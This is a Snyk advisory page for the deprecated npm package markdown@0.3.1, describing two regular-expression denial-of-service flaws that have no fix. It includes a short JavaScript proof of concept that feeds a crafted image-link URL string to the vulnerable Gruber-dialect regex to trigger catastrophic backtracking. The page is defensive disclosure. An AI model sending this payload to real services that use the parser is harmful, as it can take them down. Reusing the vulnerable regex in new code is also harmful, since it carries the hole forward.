markdown@0.3.1 vulnerabilities

A sensible Markdown parser for javascript

latest version

0.5.0
first published

13 years ago
latest version published

11 years ago
licenses detected
- MIT
  >=0
View markdown package health on Snyk Advisor Open this link in a new tab

Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the markdown package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability Vulnerable Version

Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) markdown is a yet another markdown parser, this time for JavaScript. Note: This package is no longer actively maintained and should be considered deprecated. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The `markdown.toHTML()` function has significantly degraded performance when parsing long strings containing underscores. This may lead to ReDoS if the parser accepts user input. How to fix Regular Expression Denial of Service (ReDoS)? There is no fixed version for `markdown`.	*
M Regular Expression Denial of Service (ReDoS) markdown is a yet another markdown parser, this time for JavaScript. Note: This package is no longer actively maintained and should be considered deprecated. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It is possible under certain circumstances to abuse the URL regex parse functionality available within the Gruber dialect feature to conduct denial of service attacks. Note: Exploitation of this vulnerability requires usage of the `Gruber` dialect (`dialects/gruber.js`) within `markdown`, which is not available by default. PoC by Snyk console.time('benchmark'); //regex taken from https://github.com/evilstreak/markdown-js/blob/master/src/dialects/gruber.js#L12 var urlRegexp = /(?:(?:https?\|ftp):\/\/)(?:\S+(?::\S)?@)?(?:(?!(?:10\|127)(?:\.\d{1,3}){3})(?!(?:169\.254\|192\.168)(?:\.\d{1,3}){2})(?!172\.(?:1[6-9]\|2\d\|3[0-1])(?:\.\d{1,3}){2})(?:[1-9]\d?\|1\d\d\|2[01]\d\|22[0-3])(?:\.(?:1?\d{1,2}\|2[0-4]\d\|25[0-5])){2}(?:\.(?:[1-9]\d?\|1\d\d\|2[0-4]\d\|25[0-4]))\|(?:(?:[a-z\u00a1-\uffff0-9]-)[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]+-?)[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff]{2,})))(?::\d{2,5})?(?:\/[^\s])?/i.source; //expoit/payload const str = '![Blat Blat](https://192.168916891689168916891689168916891689168916891689168916891689168916891689168916891689168916891689168916891689268192.1 "Blat Blat")'; //Duplicate of code from https://github.com/evilstreak/markdown-js/blob/master/src/dialects/gruber.js#L566 var m = str.match(new RegExp("^!\\[(.?)][ \\t]\\((" + urlRegexp + ")\\)([ \\t])([\"'].[\"'])?")) \|\| str.match( /^!\[(.?)\][ \t]\([ \t]([^")]?)(?:[ \t]+(["'])(.?)\3)?[ \t]\)/ ); console.timeEnd('benchmark'); How to fix Regular Expression Denial of Service (ReDoS)? There is no fixed version for `markdown`.	*

Regular Expression Denial of Service (ReDoS)

markdown is a yet another markdown parser, this time for JavaScript.

Note: This package is no longer actively maintained and should be considered deprecated.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The markdown.toHTML() function has significantly degraded performance when parsing long strings containing underscores. This may lead to ReDoS if the parser accepts user input.

How to fix Regular Expression Denial of Service (ReDoS)?

There is no fixed version for markdown.

Regular Expression Denial of Service (ReDoS)

markdown is a yet another markdown parser, this time for JavaScript.

Note: This package is no longer actively maintained and should be considered deprecated.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). It is possible under certain circumstances to abuse the URL regex parse functionality available within the Gruber dialect feature to conduct denial of service attacks.

Note: Exploitation of this vulnerability requires usage of the Gruber dialect (dialects/gruber.js) within markdown, which is not available by default.

PoC by Snyk

console.time('benchmark');
//regex taken from https://github.com/evilstreak/markdown-js/blob/master/src/dialects/gruber.js#L12

var urlRegexp = /(?:(?:https?|ftp):\/\/)(?:\S+(?::\S*)?@)?(?:(?!(?:10|127)(?:\.\d{1,3}){3})(?!(?:169\.254|192\.168)(?:\.\d{1,3}){2})(?!172\.(?:1[6-9]|2\d|3[0-1])(?:\.\d{1,3}){2})(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))|(?:(?:[a-z\u00a1-\uffff0-9]-*)*[a-z\u00a1-\uffff0-9]+)(?:\.(?:[a-z\u00a1-\uffff0-9]+-?)*[a-z\u00a1-\uffff0-9]+)*(?:\.(?:[a-z\u00a1-\uffff]{2,})))(?::\d{2,5})?(?:\/[^\s]*)?/i.source;

//expoit/payload
const str = '![Blat Blat](https://192.168916891689168916891689168916891689168916891689168916891689168916891689168916891689168916891689168916891689268192.1 "Blat Blat")';

//Duplicate of code from https://github.com/evilstreak/markdown-js/blob/master/src/dialects/gruber.js#L566

var m = str.match(new RegExp("^!\\[(.*?)][ \\t]*\\((" + urlRegexp + ")\\)([ \\t])*([\"'].*[\"'])?")) ||
        str.match( /^!\[(.*?)\][ \t]*\([ \t]*([^")]*?)(?:[ \t]+(["'])(.*?)\3)?[ \t]*\)/ );
console.timeEnd('benchmark');

How to fix Regular Expression Denial of Service (ReDoS)?

There is no fixed version for markdown.

Go back to all versions of this package

markdown@0.3.1 vulnerabilities

A sensible Markdown parser for javascript

latest version

first published

latest version published

licenses detected

Direct Vulnerabilities

PoC by Snyk